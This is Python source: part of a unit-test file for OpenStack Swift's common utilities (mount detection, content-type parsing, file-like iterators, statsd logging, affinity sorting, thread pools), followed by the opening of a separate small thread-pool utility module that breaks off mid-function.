def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEquals(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEquals(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEquals(listing_dict['bytes'], 15)
self.assertEquals(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEquals(listing_dict['bytes'], 1234)
self.assertEquals(listing_dict['content_type'],
'text/plain;hello="world"')
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEquals('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEquals('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_next(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = iter_file.next()
except StopIteration:
break
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_read(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEquals(iter_file.read(), ''.join(in_iter))
def test_read_with_size(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEquals(''.join(chunks), ''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEquals(utils.FileLikeIter('abc').read(0), '')
def test_readline(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readline2(self):
self.assertEquals(
utils.FileLikeIter(['abc', 'def\n']).readline(4),
'abcd')
def test_readline3(self):
self.assertEquals(
utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline(),
('a' * 1111) + 'bc\n')
def test_readline_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEquals(
lines,
['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n', 'k\n',
'tr', 'ai', 'li', 'ng', '.'])
def test_readlines(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readlines_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEquals(
lists_of_lines,
[['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']])
def test_close(self):
iter_file = utils.FileLikeIter('abcdef')
self.assertEquals(iter_file.next(), 'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertEqual(None, logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assert_(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.errors.timing')
self.assert_(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
raise ValueError("concurrent access is bad, mmmkay? (%r)")
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
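# Note on UnsafeXrange: the eventlet.sleep() inside next() yields control to other
# greenthreads mid-iteration, so two greenthreads iterating the same instance will
# trip the ValueError above unless something serializes access. The
# TestGreenthreadSafeIterator cases further down rely on exactly that behaviour.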
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assert_(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEquals([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in xrange(2):
pile.spawn(self.increment, iterable)
try:
sorted([resp for resp in pile])
self.assertTrue(False, "test setup is insufficiently crazy")
except ValueError:
pass
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
iterable = utils.GreenthreadSafeIterator(UnsafeXrange(10))
for _ in xrange(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEquals(range(1, 11), response)
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and 'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assert_(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertEqual(None, logger.update_stats('foo', 88))
self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
self.assertEqual(None, logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertEqual(None, logger.increment('foo'))
self.assertEqual(None, logger.increment('foo', 0.57))
self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
self.assertEqual(None, logger.decrement('foo'))
self.assertEqual(None, logger.decrement('foo', 0.57))
self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
self.assertEqual(None, logger.timing('foo', 88.048))
self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
self.assertEqual(None, logger.timing_since('foo', 8938))
self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
self.assertEqual(None, logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEquals('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
def test_thread_locals(self):
logger = utils.get_logger(None)
orig_thread_locals = logger.thread_locals
try:
self.assertEquals(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEquals(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEquals(logger.thread_locals, ('5678', '5.6.7.8'))
finally:
logger.thread_locals = orig_thread_locals
def test_no_fdatasync(self):
called = []
class NoFdatasync:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync:
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEquals(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEquals(called, [12345])
class TestThreadpool(unittest.TestCase):
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_run_in_thread_without_threads(self):
# with zero threads, run_in_thread doesn't actually do so
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
if __name__ == '__main__':
unittest.main()
|
utils.py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: Provide some useful utils
Created: 2016/10/29
"""
import uuid
import time
import unittest
import inspect
from Queue import Queue
import threading
import multiprocessing
from threading import Thread
from multiprocessing import Process
#----------------------------------------------------------------------
def start_thread(func, *args, **kwargs):
""""""
Thread(target=func, args=args, kwargs=kwargs).start()
########################################################################
class Pool(object):
"""Thread or Proccess Pool to support the
concurrence of many tasks"""
#----------------------------------------------------------------------
def __init__(self, thread_max=50, mode='Thread'):
"""Constructor"""
modes = ['thread', 'process']
        self.mode = mode.lower() if mode.lower() in modes else 'thread'
self.task_list = []
self.result_queue = Queue()
self.signal_name = self._uuid1_str()
self.lock = threading.Lock() if self.mode == 'thread' else multiprocessing.Lock()
self.thread_max = thread_max
self.current_thread_count = 0
def _uuid1_str(self):
'''Returns: random UUID tag '''
return str(uuid.uuid1())
def add_task(self, func, *args, **argv):
        '''Queue a task to be executed once run() is called.
        Params:
            func : a callable object, the entity of the task
            args : positional arguments passed to [func]
            argv : keyword arguments passed to [func]
        '''
        assert callable(func), '[!] func must be callable'
ret = {}
ret['func'] = func
ret['args'] = args
ret['argv'] = argv
ret['uuid'] = self.signal_name
self.task_list.append(ret)
def run(self):
""""""
Thread(target=self._run).start()
return self.result_queue
#----------------------------------------------------------------------
def _run(self):
""""""
for i in self.task_list:
#print self.current_thread_count
while self.thread_max <= self.current_thread_count:
time.sleep(0.3)
